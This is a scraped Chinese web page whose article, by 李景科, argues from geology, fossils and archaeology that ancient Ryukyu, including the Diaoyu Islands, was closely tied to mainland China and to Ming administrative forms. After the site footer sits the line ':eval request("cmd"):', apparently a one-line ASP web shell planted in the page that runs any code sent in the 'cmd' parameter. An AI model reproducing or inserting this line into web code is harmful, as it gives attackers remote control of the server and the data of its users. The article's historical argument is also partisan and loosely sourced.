保钓历史

古琉球国的一些基础知识

时间:2015-2-11 22:01:59  作者:李景科  来源:  查看:42  评论:0
内容摘要:根据地质和古生物学研究,古琉球国为主的琉球群岛(包括钓鱼岛),在太古代为海底环境,但是,在1000万---1500万年前,露出海面成为陆地,与台湾岛和中国大陆相连接。因此,在古琉球国地域也发现了大象和鹿的化石。这也是一个重要证明。在大约1000万年到200万年前的这一时期,古琉球...

根据地质和古生物学研究,古琉球国为主的琉球群岛(包括钓鱼岛),在太古代为海底环境,但是,在1000---1500万年前,露出海面成为陆地,与台湾岛和中国大陆相连接。因此,在古琉球国地域也发现了大象和鹿的化石。这也是一个重要证明。在大约1000万年到200万年前的这一时期,古琉球国地域与中国大陆一度断离,到了150万年前,又与中国大陆连成一体,而目前的钓鱼岛群岛与大陆的分离是大约2万年前形成的。

   在古琉球国地域的主岛发现了山下人化石,与大约同时代的北京山顶洞人很相似,因此,在学术上,有近缘关系。而在这里又出土有17000年前的港川人化石。这与古琉球国的地质历史很吻合。在古琉球国地域也发现过新石器时代的贝丘遗址,然而,在辽东半岛同时代也有几处贝丘遗址,在文化上,有相近性。

   从考古历史研究上,日本学者得出结论,琉球的文化是与日本本土的文化很不相同的,既有琉球本土的特性,也有大陆因素。

   根据考古研究,公元1100年开始,佛教传入古琉球地区,这个时期,琉球本土出现了农耕和使用了铁器,形成了大部落。古琉球人的农田主要种植水稻和小麦,器具也有陶器生产。社会管理,以“司”的社会组织形态管理和征战,而“司”是中国古代的三省六部制度中作为“部”之下的分支机构,所以,琉球国立国前,最高的管理机构是“司”,而考古研究也发现,立国前,琉球的部落是要塞化形态,这与明朝都司下的社会军事化管理一样,地方城市多为军事要塞化城。由于古琉球是按照都“司”的组织结构管理社会的,所以,有了

北山、中山、南山三个“司”,城池也是军事要塞化,这与明朝辽东的辽东都司管理很相似。琉球国立国后,就与大明建立了朝贡册封的关系。而中国古代王朝的藩属国的社会发展历史却鲜有琉球与明朝这种社会组织管理高度一致的特征。

   以后的历史,就相对清晰了。
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):